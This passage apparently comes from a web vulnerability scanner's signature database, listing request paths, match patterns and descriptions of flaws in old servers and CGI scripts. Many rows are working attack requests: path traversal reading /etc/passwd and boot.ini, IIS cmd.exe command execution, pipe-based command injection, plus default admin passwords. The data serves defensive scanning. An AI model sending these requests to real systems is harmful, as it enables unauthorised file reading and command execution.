"000322","17660","3","/SiteServer/Admin/knowledge/persmbr/VsTmPr.asp","GET","200","","","","","Expose various LDAP service and backend configuration parameters","","" "000323","0","3","/trace.axd","GET","Application Trace","","","","","The .NET IIS server has application tracing enabled. This could allow an attacker to view the last 50 web requests.","","" "000324","0","3","/tvcs/getservers.exe?action=selects1","GET","200","","","","","Following steps 2-4 of this page may reveal a zip file that contains passwords and system details.","","" "000325","0","3","/whatever.htr","GET","Error: The requested file could not be found\. <\/html>","200","","","","May reveal physical path. htr files may also be vulnerable to an off-by-one overflow that allows remote command execution (see MS02-018)","","" "000327","0","3","/./","GET","[Ii]ndex [Oo]f ","","","","","Appending '/./' to a directory allows indexing","","" "000328","0","3","/nsn/fdir.bas:ShowVolume","GET","200","","","","","You can use ShowVolume and ShowDirectory directly on the Novell server (NW5.1) to view the filesystem without having to log in","","" "000329","0","3","/nsn/fdir.bas","GET","200","","","","","You can use fdir to ShowVolume and ShowDirectory.","","" "000330","0","3","/servlet/webacc?User.html=noexist","GET","templates\/","","","","","Netware web access may reveal full path of the web server. Apply vendor patch or upgrade.","","" "000331","0","4","/forum/admin/database/wwForum.mdb","GET","200","","","","","Web Wiz Forums pre 7.5 is vulnerable to Cross-Site Scripting attacks. Default login/pass is Administrator/letmein","","" "000332","0","4","/webmail/blank.html","GET","200","","","","","IlohaMail 0.8.10 contains an XSS vulnerability. Previous versions contain other non-descript vulnerabilities.","","" "000333","0","5","/jamdb/","GET","200","","","","","JamDB pre 0.9.2 mp3.php and image.php can allow user to read arbitrary file out of docroot.","","" "000334","1201","6","/cgi/cgiproc?","GET","200","","","","","It may be possible to crash Nortel Contivity VxWorks by requesting '/cgi/cgiproc?$' (not attempted!). Upgrade to version 2.60 or later.","","" "000335","0","7","@CGIDIRSaddbanner.cgi","GET","200","","","","","This CGI may allow attackers to read any file on the system.","","" "000336","836","7","@CGIDIRSaf.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd","GET","root:","","","","","AlienForm2 revision 1.5 allows any file to be read from the remote system.","","" "000337","0","7","@CGIDIRSalienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd","GET","root:","","","","","AlienForm2 revision 1.5 allows any file to be read from the remote system.","","" "000338","0","7","@CGIDIRSshtml.dll","GET","200","","","","","This may allow attackers to retrieve document source.","","" "000339","2400","7","/admin-serv/tasks/configuration/ViewLog?file=passwd&num=5000&str=&directories=admin-serv%2Flogs%2f..%2f..%2f..%2f..%2f..%2f..%2fetc&id=admin-serv","GET","root:","","","","","iPlanet Administration Server 5.1 allows remote users to download any file from the server. Upgrade to SunOne DS5.2 and in iDS5.1 SP2 Hotfix 2."," ","" "000340","0","8","@CGIDIRSaglimpse.cgi","GET","200","","","","","This CGI may allow attackers to execute remote commands.","","" "000341","0","8","@CGIDIRSaglimpse","GET","200","","","","","This CGI may allow attackers to execute remote commands.","","" "000342","0","8","@CGIDIRSarchitext_query.cgi","GET","200","","","","","Versions older than 1.1 of Excite for Web Servers allow attackers to execute arbitrary commands.","","" "000343","0","8","@CGIDIRScgiemail-1.4/cgicso?query=AAA","GET","400 Required field missing: fingerhost","","","","","This CGI allows attackers to execute remote commands.","","" "000344","0","8","/cgi-local/cgiemail-1.6/cgicso?query=AAA","GET","400 Required field missing: fingerhost","","","","","This CGI allows attackers to execute remote commands.","","" "000345","6196","8","/servlet/SchedulerTransfer","GET","200","Error Occurred","","","","PeopleSoft SchedulerTransfer servlet found, which may allow remote command execution. See http://www.iss.net/issEn/delivery/xforce/alertdetail.jsp?oid=21999","","" "000346","0","8","/servlet/sunexamples.BBoardServlet","GET","200","Error Occurred","","","","This default servlet lets attackers execute arbitrary commands."," ","" "000347","6196","8","/servlets/SchedulerTransfer","GET","200","Error Occurred","","","","PeopleSoft SchedulerTransfer servlet found, which may allow remote command execution. See http://www.iss.net/issEn/delivery/xforce/alertdetail.jsp?oid=21999","","" "000348","0","8","@CGIDIRScmd.exe?/c+dir","GET","200","","","","","cmd.exe can execute arbitrary commands","","" "000349","0","8","@CGIDIRScmd1.exe?/c+dir","GET","200","","","","","cmd1.exe can execute arbitrary commands","","" "000350","0","8","@CGIDIRShello.bat?&dir+c:\\","GET","200","","","","","This batch file may allow attackers to execute remote commands.","","" "000351","0","8","@CGIDIRSpost32.exe|dir%20c:\\","GET","200","","","","","post32 can execute arbitrary commands","","" "000352","0","8","/perl/-e%20print%20Hello","GET","200","","","","","The Perl interpreter on the Novell system may allow any command to be executed. See BID-5520. Installing Perl 5.6 might fix this issue.","","" "000353","0","a","/admin.cgi","GET","Administration","","","","","InterScan VirusWall administration is accessible without authentication.","","" "000354","0","a","/interscan/","GET","Administration","","","","","InterScan VirusWall administration is accessible without authentication.","","" "000355","0","a","/vgn/legacy/save","GET","200","","","","","Vignette Legacy Tool may be unprotected. To access this resource, set a cookie called 'vgn_creds' with any value.","","" "000356","0","b","/","GET","default Tomcat","","","","","Appears to be a default Apache Tomcat install.","","" "000357","0","b","/IDSWebApp/IDSjsp/Login.jsp","GET","200","","","","","Tivoli Directory Server Web Administration.","","" "000358","6466","b","/quikstore.cfg","GET","200","","","","","Shopping cart config file, http://www.quikstore.com/, http://www.mindsec.com/advisories/post2.txt","","" "000359","0","b","/quikstore.cgi","GET","200","","","","","A shopping cart.","","" "000360","0","b","/securecontrolpanel/","GET","200","","","","","Web Server Control Panel","","" "000361","0","b","/siteminder","GET","200","","","","","This may be an indication that the server is running Siteminder for SSO","","" "000362","0","b","/webmail/","GET","200","","","","","Web based mail package installed.","","" "000363","0","b","/Xcelerate/LoginPage.html","GET","Xcelerate Login Page","","","","","Xcelerate Content Server by Divine/OpenMarket login page found.","","" "000364","0","b","/_cti_pvt/","GET","200","","","","","FrontPage directory found.","","" "000365","0","b","/smg_Smxcfg30.exe?vcc=3560121183d3","GET","200","","","","","This may be a Trend Micro Officescan 'backdoor'.","","" "000366","0","2b","/examples/servlets/index.html","GET","Servlet Examples","","","","","Apache Tomcat default JSP pages present.","","" "000367","0","3b","/nsn/..%5Cutil/attrib.bas","GET","200","","","","","Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server","","" "000368","0","3b","/nsn/..%5Cutil/chkvol.bas","GET","200","","","","","Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server","","" "000369","0","3b","/nsn/..%5Cutil/copy.bas","GET","200","","","","","Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server","","" "000370","0","3b","/nsn/..%5Cutil/del.bas","GET","200","","","","","Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server","","" "000371","0","3b","/nsn/..%5Cutil/dir.bas","GET","200","","","","","Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server","","" "000372","0","3b","/nsn/..%5Cutil/dsbrowse.bas","GET","200","","","","","Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server","","" "000373","0","3b","/nsn/..%5Cutil/glist.bas","GET","200","","","","","Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server","","" "000374","0","3b","/nsn/..%5Cutil/lancard.bas","GET","200","","","","","Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server","","" "000375","0","3b","/nsn/..%5Cutil/md.bas","GET","200","","","","","Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server","","" "000376","0","3b","/nsn/..%5Cutil/rd.bas","GET","200","","","","","Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server","","" "000377","0","3b","/nsn/..%5Cutil/ren.bas","GET","200","","","","","Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server ","","" "000378","0","3b","/nsn/..%5Cutil/send.bas","GET","200","","","","","Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server","","" "000379","0","3b","/nsn/..%5Cutil/set.bas","GET","200","","","","","Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server","","" "000380","0","3b","/nsn/..%5Cutil/slist.bas","GET","200","","","","","Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server","","" "000381","0","3b","/nsn/..%5Cutil/type.bas","GET","200","","","","","Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server","","" "000382","0","3b","/nsn/..%5Cutil/userlist.bas","GET","200","","","","","Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server","","" "000383","0","3b","/nsn/..%5Cweb/env.bas","GET","200","","","","","Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server","","" "000384","0","3b","/nsn/..%5Cweb/fdir.bas","GET","200","","","","","Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server","","" "000385","0","3b","/nsn/..%5Cwebdemo/env.bas","GET","200","","","","","Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server","","" "000386","0","3b","/nsn/..%5Cwebdemo/fdir.bas","GET","200","","","","","Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server","","" "000387","19767","c","/wikihome/action/conflict.php?TemplateDir=@RFIURL","GET","PHP Version","","","","","Some versions of WikkiTikkiTavi allow external source to be included.","","" "000388","0","1","@CGIDIRSarchie","GET","200","","","","","Gateway to the unix command, may be able to submit extra commands","","" "000389","0","1","@CGIDIRScalendar.pl","GET","200","","","","","Gateway to the unix command, may be able to submit extra commands","","" "000390","0","1","@CGIDIRScalendar","GET","200","","","","","Gateway to the unix command, may be able to submit extra commands","","" "000391","0","1","@CGIDIRSdate","GET","200","","","","","Gateway to the unix command, may be able to submit extra commands","","" "000392","0","1","@CGIDIRSfortune","GET","200","","","","","Gateway to the unix command, may be able to submit extra commands","","" "000393","0","1","@CGIDIRSredirect","GET","200","","","","","Redirects via URL from form","","" "000394","0","1","@CGIDIRSuptime","GET","200","","","","","Gateway to the unix command, may be able to submit extra commands","","" "000395","0","1","@CGIDIRSwais.pl","GET","200","","","","","Gateway to the unix command, may be able to submit extra commands","","" "000396","0","2","//","GET","[Ii]ndex [Oo]f ","","","","","Apache on Red Hat Linux release 9 reveals the root directory listing by default if there is no index page.","","" "000397","0","2","/webtop/wdk/","GET","Directory Listing for \/wdk\/","","","","","Documentum Webtop Server appears to be installed","","" "000398","17113","2","/SilverStream","GET","title>.*SilverStream.*<\/title","","","","","SilverStream allows directory listing","","" "000399","0","2","/signon","GET","Administrator Login","","","","","Tivoli administrator login found. Test the default login of admin/admin. Tivoli allows system administration.","","" "000400","0","2","/upd/","GET","200","","","","","WASD Server can allow directory listings by requesting /upd/directory/. Upgrade to a later version and secure according to the documents on the WASD web site.","","" "000401","0","3","/examples/jsp/source.jsp??","GET","Directory Listing","","","","","Tomcat 3.23/3.24 allows directory listings by performing a malformed request to a default jsp. Default pages should be removed.","","" "000402","34884","3","/lpt9","GET","FileNotFoundException:","","","","","Apache Tomcat 4.0.3 reveals the web root when requesting a non-existent DOS device. Upgrade to version 4.1.3beta or higher.","","" "000403","0","3","/cfcache.map","GET","Mapping","","","","","May leak directory listing, may also leave server open to a DOS. http://www.securiteam.com/windowsntfocus/ColdFusion_Information_Exposure__CFCACHE_Tag_.html","","" "000404","0","3","/cfdocs/cfcache.map","GET","Mapping","","","","","May leak directory listing, may also leave server open to a DOS","","" "000405","0","3","/CVS/Entries","GET","200","","","","","CVS Entries file may contain directory listing information.","","" "000406","0","3","/lpt9.xtp","GET","java\.io\.FileNotFoundException:","","","","","Resin 2.1 and Tomcat servers reveal the server path when a DOS device is requested.","","" "000408","8450","37","@PHPMYADMINdb_details_importdocsql.php?submit_show=true&do=import&docpath=../","GET","Ignoring file \.<\/font><\/p>","200","","","","phpMyAdmin allows directory listings remotely. Upgrade to version 2.5.3 or higher. BID-7963.","","" "000409","0","3","/asp/sqlqhit.asp","GET","CHARACTERIZATION","","","","","This sample ASP allows anyone to retrieve directory listings.","","" "000410","0","3","/asp/SQLQHit.asp","GET","CHARACTERIZATION","","","","","This sample ASP allows anyone to retrieve directory listings.","","" "000411","0","3","/iissamples/issamples/sqlqhit.asp","GET","CHARACTERIZATION","","","","","This sample ASP allows anyone to retrieve directory listings.","","" "000412","0","3","/iissamples/issamples/SQLQHit.asp","GET","CHARACTERIZATION","","","","","This sample ASP allows anyone to retrieve directory listings.","","" "000413","0","3","/ISSamples/sqlqhit.asp","GET","CHARACTERIZATION","","","","","This sample ASP allows anyone to retrieve directory listings.","","" "000414","0","3","/ISSamples/SQLQHit.asp","GET","CHARACTERIZATION","","","","","This sample ASP allows anyone to retrieve directory listings.","","" "000415","0","3","/junk.aspx","GET","NET Framework Version:","","\[FileNotFoundException\]:","","","ASP.NET reveals its version in invalid .aspx error messages.","","" "000416","0","3","/oc/Search/sqlqhit.asp","GET","CHARACTERIZATION","","","","","This sample ASP allows anyone to retrieve directory listings.","","" "000417","0","3","/oc/Search/SQLQHit.asp","GET","CHARACTERIZATION","","","","","This sample ASP allows anyone to retrieve directory listings.","","" "000418","0","3","/search/htx/sqlqhit.asp","GET","CHARACTERIZATION","","","","","This sample ASP allows anyone to retrieve directory listings.","","" "000419","0","3","/search/htx/SQLQHit.asp","GET","CHARACTERIZATION","","","","","This sample ASP allows anyone to retrieve directory listings.","","" "000420","0","3","/search/sqlqhit.asp","GET","CHARACTERIZATION","","","","","This sample ASP allows anyone to retrieve directory listings.","","" "000421","0","3","/search/SQLQHit.asp","GET","CHARACTERIZATION","","","","","This sample ASP allows anyone to retrieve directory listings.","","" "000422","0","3","/sqlqhit.asp","GET","CHARACTERIZATION","","","","","This sample ASP allows anyone to retrieve directory listings.","","" "000423","0","3","/SQLQHit.asp","GET","CHARACTERIZATION","","","","","This sample ASP allows anyone to retrieve directory listings.","","" "000424","15455","3","@CGIDIRScom5..........................................................................................................................................................................................................................box","GET","Execution of Perl script","","","","","Lotus reveals file system paths when requesting DOS devices with bad syntax.","","" "000425","15455","3","@CGIDIRScom5.java","GET","Execution of","","","","","Lotus reveals file system paths when requesting DOS devices with bad syntax.","","" "000426","15455","3","@CGIDIRScom5.pl","GET","Execution of Perl script","","","","","Lotus reveals file system paths when requesting DOS devices with bad syntax.","","" "000427","0","3","/?Open","GET","\.nsf","","","","","This displays a list of all databases on the server. Disable this capability via server options.","","" "000428","0","3","/?OpenServer","GET","\\\/icons\\\/abook\\\.gif","","","","","This install allows remote users to enumerate DB names, see http://www.securiteam.com/securitynews/6W0030U35W.html","","" "000429","0","3","/catalog.nsf","GET","200","","","","","A list of server databases can be retrieved, as well as a list of ACLs.","","" "000430","0","3","/cersvr.nsf","GET","200","","","","","Server certificate data can be accessed remotely.","","" "000431","50","3","/cgi-bin/testing_whatever","GET","domino\/cgi-bin","","","","","The Domino server reveals the system path to the cgi-bin directory by requesting a bogus CGI.","","" "000432","0","3","/domlog.nsf","GET","200","","","","","The domain server logs can be accessed remotely.","","" "000433","0","3","/events4.nsf","GET","200","","","","","The events log can be accessed remotely.","","" "000434","0","3","/log.nsf","GET","200","","","","","The server log is remotely accessible.","","" "000435","0","3","/names.nsf","GET","200","","","","","User names and groups can be accessed remotely (possibly password hashes as well)","","" "000436","31150","3","/LOGIN.PWD","GET","200","","","","","MIPCD password file (passwords are not encrypted). MIPDCD should not have the web interface enabled.","","" "000437","31150","3","/USER/CONFIG.AP","GET","200","","","","","MIPCD configuration information. MIPCD should not have the web interface enabled.","","" "000438","0","3","@CGIDIRSmail","GET","200","","","","","Simple Perl mailing script to send form data to a pre-configured email address","","" "000439","0","3","@CGIDIRSnph-error.pl","GET","200","","","","","Gives more information in error messages","","" "000440","0","3","@CGIDIRSpost-query","POST","200","","","","","Echoes back result of your POST","","" "000441","0","3","@CGIDIRSquery","GET","200","","","","","Echoes back result of your GET","","" "000442","0","3","@CGIDIRStest-cgi.tcl","GET","200","","","","","May echo environment variables or give directory listings","","" "000443","0","3","@CGIDIRStest-env","GET","200","","","","","May echo environment variables or give directory listings","","" "000444","57612","3","/.perf","GET","ListenSocket","","","","","Contains Netscape/iPlanet server performance information","","" "000445","122","3","/","get","[Ii]ndex [Oo]f ","","","","","Fasttrack can give a directory listing if issued 'get' instead of 'GET'","","" "000446","0","3","/","INDEX","[Ii]ndex [Oo]f ","","","","","Netscape web publisher can give directory listings with the INDEX tag. Disable INDEX or Web Publisher.","","" "000447","0","3","//","GET","Proxy autoconfig","","","","","Proxy auto configuration file retrieved.","","" "000448","0","3","/admin-serv/config/admpw","GET","200","","","","","This file contains the encrypted Netscape admin password. It should not be accessible via the web.","","" "000449","39140","3","/test.php%20","GET","<\?php","","","","","The OmniHTTP install may allow php/shtml/pl script disclosure. Upgrade to the latest version.","","" "000450","0","3","/*.*","GET","[Ii]ndex [Oo]f ","","","","","WASD Server reveals the contents of directories via this URL. Upgrade to a later version and secure according to the documents on the WASD web site.","","" "000451","0","3","/cgi-bin/cgi_process","GET","200","","","","","WASD reveals a lot of system information in this script. It should be removed.","","" "000452","0","3","/ht_root/wwwroot/-/local/httpd$map.conf","GET","200","","","","","WASD reveals the http configuration file. Upgrade to a later version and secure according to the documents on the WASD web site.","","" "000453","0","3","/JUNK(10)","GET","Document not found \.\.\. \/","","","","","WASD reveals the web root in error requests. Upgrade to a later version and secure according to the documents on the WASD web site.","","" "000454","0","3","/local/httpd$map.conf","GET","200","","","","","WASD reveals the http configuration file. Upgrade to a later version and secure according to the documents on the WASD web site.","","" "000455","0","3","/tree","GET","200","","","","","WASD Server reveals the entire web root structure and files via this URL. Upgrade to a later version and secure according to the documents on the WASD web site.","","" "000456","0","3","@CGIDIRSindex.js0x70","GET","\\<\\\%\\=","","","","","Weblogic can be tricked into revealing JSP source by adding '0x70' to end of the URL.","","" "000457","576","3","/%00/","GET","<\%","","","","","Weblogic allows directory listings with %00 (or indexing is enabled), upgrade to v6.0 SP1 or higher. BID-2513.","","" "000458","576","3","/%00/","GET","directory listing of","","","","","Weblogic allows directory listings with %00 (or indexing is enabled), upgrade to v6.0 SP1 or higher. BID-2513.","","" "000459","576","3","/%00/","GET","[Ii]ndex [Oo]f ","","","","","Weblogic allows directory listings with %00 (or indexing is enabled), upgrade to v6.0 SP1 or higher. BID-2513","","" "000460","576","3","/%2e/","GET","<\%","","","","","Weblogic allows source code or directory listing, upgrade to v6.0 SP1 or higher. BID-2513","","" "000461","576","3","/%2e/","GET","directory listing of","","","","","Weblogic allows source code or directory listing, upgrade to v6.0 SP1 or higher. BID-2513.","","" "000462","576","3","/%2e/","GET","[Ii]ndex [Oo]f ","","","","","Weblogic allows source code or directory listing, upgrade to v6.0 SP1 or higher. BID-2513.","","" "000463","576","3","/%2f/","GET","<\%","","","","","Weblogic allows source code or directory listing, upgrade to v6.0 SP1 or higher. BID-2513","","" "000464","576","3","/%2f/","GET","directory listing of","","","","","Weblogic allows source code or directory listing, upgrade to v6.0 SP1 or higher. BID-2513.","","" "000465","576","3","/%2f/","GET","[Ii]ndex [Oo]f ","","","","","Weblogic allows source code or directory listing, upgrade to v6.0 SP1 or higher. BID-2513.","","" "000466","576","3","/%5c/","GET","<\%","","","","","Weblogic allows source code or directory listing, upgrade to v6.0 SP1 or higher. BID-2513","","" "000467","576","3","/%5c/","GET","directory listing of","","","","","Weblogic allows source code or directory listing, upgrade to v6.0 SP1 or higher. BID-2513.","","" "000468","576","3","/%5c/","GET","[Ii]ndex [Oo]f ","","","","","Weblogic allows source code or directory listing, upgrade to v6.0 SP1 or higher. BID-2513.","","" "000469","576","3","/index.jsp%00x","GET","<\%=","","","","","Bea WebLogic 6.1 SP 2 discloses source by appending %00x to a JSP request. Upgrade to a version newer than 6.2 SP 2 for Win2k. BID-2513","","" "000470","3268","2","/weblogic","GET","[Ii]ndex [Oo]f ","","","","","Directory indexing found.","","" "000471","0","3","/%a%s%p%d","GET","\*s\?d","","","","","Format bug is present & may reveal system path, upgrade to the latest version.","","" "000472","0","3","/index.html%20","GET","File for URL","","","","","Website may reveal file system paths by adding %20 to the end of a legitimate .html request.","","" "000473","0","23","/852566C90012664F","GET","200","","","","","This database can be read using the replica ID without authentication.","","" "000474","0","23","/hidden.nsf","GET","200","","","","","This database can be read without authentication. Common database name.","","" "000475","0","23","/mail.box","GET","200","","","","","The mail database can be read without authentication.","","" "000477","0","23","/setup.nsf","GET","200","","","","","The server can be configured remotely, or current setup can be downloaded.","","" "000478","0","23","/statrep.nsf","GET","200","","","","","Any reports generated by the admins can be retrieved.","","" "000479","0","23","/webadmin.nsf","GET","200","","","","","The server admin database can be accessed remotely.","","" "000480","0","3d","@CGIDIRScgitest.exe","GET","200","","","","","This CGI allows remote users to download other CGI source code. May have a buffer overflow in the User-Agent header.","","" "000481","0","6","/examples/servlet/AUX","GET","200","","","","","Apache Tomcat versions below 4.1 may be vulnerable to DoS by repeatedly requesting this file.","","" "000482","6666","6","@CGIDIRShpnst.exe?c=p+i=SrvSystemInfo.html","GET","200","","","","","HP Instant TopTools may be vulnerable to a DoS by requesting hpnst.exe?c=p+i=hpnst.exe multiple times.","","" "000483","0","6","/cfdocs/cfmlsyntaxcheck.cfm","GET","200","","not found","","","Can be used for a DoS on the server by requesting it check all .exe's","","" "000484","0","6","/Config1.htm","GET","200","","","","","This may be a D-Link. Some devices have a DoS condition if an oversized POST request is sent. This DoS was not tested. See http://www.phenoelit.de/stuff/dp-300.txt for info.","","" "000485","0","6","/contents/extensions/asp/1","GET","200","","","","","The IIS system may be vulnerable to a DOS, see MS02-018 for details.","","" "000486","0","6","/WebAdmin.dll?View=Logon","GET","200","","","","","Some versions of WebAdmin are vulnerable to a remote DoS (not tested). See http://www.ngssoftware.com.","","" "000487","55370","6","@CGIDIRSPbcgi.exe","GET","200","","","","","Sambar may be vulnerable to a DOS when a long string is passed to Pbcgi.exe (not attempted). Default CGI should be removed from web servers.","","" "000488","55369","6","@CGIDIRStestcgi.exe","GET","200","","","","","Sambar may be vulnerable to a DOS when a long string is passed to testcgi.exe (not attempted). Default CGI should be removed from web servers.","","" "000489","0","6","/cgi-win/cgitest.exe","GET","200","","","","","This CGI may allow the server to be crashed remotely, see http://www.securityoffice.net/ for details. Remove this default CGI.","","" "000490","0","7","/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd","GET","root:","","","","","The Web_Server_4D is vulnerable to a directory traversal problem.","","" "000491","0","8","/c/winnt/system32/cmd.exe?/c+dir+/OG","GET","Directory of c","","","","","This machine is infected with Code Red, or has Code Red leftovers.","","" "000492","0","8","@CGIDIRSsnorkerz.bat","GET","200","","","","","Arguments passed to DOS CGI without checking","","" "000493","0","8","@CGIDIRSsnorkerz.cmd","GET","200","","","","","Arguments passed to DOS CGI without checking","","" "000494","0","8","/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:%5c","GET","\[winnt\]","","","Internal server error","","Can issue arbitrary commands to host.","","" "000495","0","8","/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:%5c","GET","The paramater is incorrect","","","Internal server error","","May be able to issue arbitrary commands to host.","","" "000496","0","8","/msadc/samples/adctest.asp","GET","Remote Data Service","","","","","The IIS sample application adctest.asp may be used to remotely execute commands on the server. RFP9901 (http://www.wiretrip.net/rfp/p/doc.asp/i2/d3.htm)","","" "000497","0","b","/JUNK(10)","GET","SecureIIS application","","","","","Server appears to be running eEye's SecureIIS application, http://www.eeye.com/.","","" "000498","0","b","/somethingnotthere.ida","GET","Rejected-By-UrlScan","","","","","The IIS server is running UrlScan","","" "000500","0","d","@CGIDIRSwebfind.exe?keywords=01234567890123456789","GET","500","","","","","May be vulnerable to a buffer overflow (request 2000 bytes of data). Upgrade to WebSitePro 2.5 or greater","","" "000501","0","d","/cgi-shl/win-c-sample.exe","GET","200","","","","","win-c-sample.exe has a buffer overflow","","" "000502","849","34","/examples/servlet/TroubleShooter","GET","TroubleShooter Servlet Output","","","","","Tomcat default JSP page reveals system information and may be vulnerable to XSS.","","" "000503","724","8","@CGIDIRSans.pl?p=../../../../../usr/bin/id|&blah","GET","uid","","","","","Avenger's News System allows commands to be issued remotely.","","" "000504","724","8","@CGIDIRSans/ans.pl?p=../../../../../usr/bin/id|&blah","GET","uid","","","","","Avenger's News System allows commands to be issued remotely.","","" "000505","0","2","/goform/CheckLogin?login=root&password=tslinux","GET","MainPageTable","","","","","The Cyclades' web user 'root' still has the default password 'tslinux' set. This should be changed immediately. Also, the id/password is hashed to create the sessionId cookie, which is bad.","","" "000506","57324","5","/[SecCheck]/..%2f../ext.ini","GET","\[SERVICES\]","","","","","BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information.","","" "000507","57324","5","/[SecCheck]/..%255c..%255c../ext.ini","GET","\[SERVICES\]","","","","","BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information.","","" "000508","57324","5","/[SecCheck]/..%252f..%252f../ext.ini","GET","\[SERVICES\]","","","","","BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information.","","" "000509","1","5","/cgi/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\winnt\win.ini","GET","\[fonts\]","","","","","The ColdFusion install allows attackers to read arbitrary files remotely","","" "000510","1","5","/cgi/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\windows\win.ini","GET","\[fonts\]","","","","","The ColdFusion install allows attackers to read arbitrary files remotely","","" "000511","0","5","/.nsf/../winnt/win.ini","GET","200","","","","","This win.ini file can be downloaded.","","" "000512","0","5","/prxdocs/misc/prxrch.idq?CiTemplate=../../../../../../../../../../winnt/win.ini","GET","\[fonts\]","","","","","This allows arbitrary files to be retrieved from the server. MS01-033.","","" "000513","0","5","/query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini","GET","\[fonts\]","","","","","This allows arbitrary files to be retrieved from the server. MS01-033.","","" "000514","0","5","/iissamples/issamples/fastq.idq?CiTemplate=../../../../../../../../../../winnt/win.ini","GET","\[fonts\]","","","","","This allows arbitrary files to be retrieved from the server. MS01-033.","","" "000515","0","5","/iissamples/issamples/query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini","GET","\[fonts\]","","","","","This allows arbitrary files to be retrieved from the server. MS01-033.","","" "000516","1210","5","/default.htm%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20","GET","\[fonts\]","","","","","Server may be vulnerable to a Webhits.dll arbitrary file retrieval. Ensure Q252463i, Q252463a or Q251170 is installed. MS00-006.","","" "000517","1210","5","/default.htm%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20","GET","\[windows\]","","","","","Server may be vulnerable to a Webhits.dll arbitrary file retrieval. Ensure Q252463i, Q252463a or Q251170 is installed. MS00-006.","","" "000518","0","5","/................../config.sys","GET","200","","","","","PWS allows files to be read by prepending multiple '.' characters. At worst, IIS, not PWS, should be used.","","" "000519","0","5","/cfdocs/exampleapp/email/getfile.cfm?filename=c:\boot.ini","GET","boot loader","","","","","Allows an attacker to view arbitrary files","","" "000520","0","5","/cfdocs/exampleapp/docs/sourcewindow.cfm?Template=c:\boot.ini","GET","boot loader","","","","","Allows an attacker to view arbitrary files","","" "000521","0","5","/cfdocs/expeval/exprcalc.cfm?OpenFilePath=c:\boot.ini","GET","boot loader","","","","","Allows an attacker to view arbitrary files.","","" "000522","5553","5","/netget?sid=user&msg=300&file=../../../../../../../../../boot.ini","GET","boot loader","","","","","Sybex E-Trainer allows arbitrary files to be retrieved.","","" "000523","5553","5","/netget?sid=user&msg=300&file=../../../../../../../../../../etc/passwd","GET","root:","","","","","Sybex E-Trainer allows arbitrary files to be retrieved.","","" "000524","0","5","/php/php.exe?c:\winnt\boot.ini","GET","boot loader","","","","","Apache/PHP installations can be misconfigured (according to documentation) to allow files to be retrieved remotely.","","" "000525","53880","5","/phpping/index.php?pingto=www.test.com%20|%20dir%20c:\\","GET","boot\.ini","","","","","PHP Ping allows commands to be executed on the remote host.","","" "000526","14484","5","/scripts/db4web_c.exe/dbdirname/c%3A%5Cboot.ini","GET","boot loader","","","","","The boot.ini file was retrieved by using the db4web executable.","","" "000527","0","5","/us/cgi-bin/sewse.exe?d:/internet/sites/us/sewse/jabber/comment2.jse+c:\boot.ini","GET","boot loader","","","","","Default scripts can allow arbitrary access to the host.","","" "000528","59599","5","/wx/s.dll?d=/boot.ini","GET","boot loader","","","","","WebCollection Plus allows any file to be retrieved from the remote system.","","" "000529","0","5","@CGIDIRSAlbum?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0","GET","resolv\.conf","","","","","This CGI allows attackers to view arbitrary files 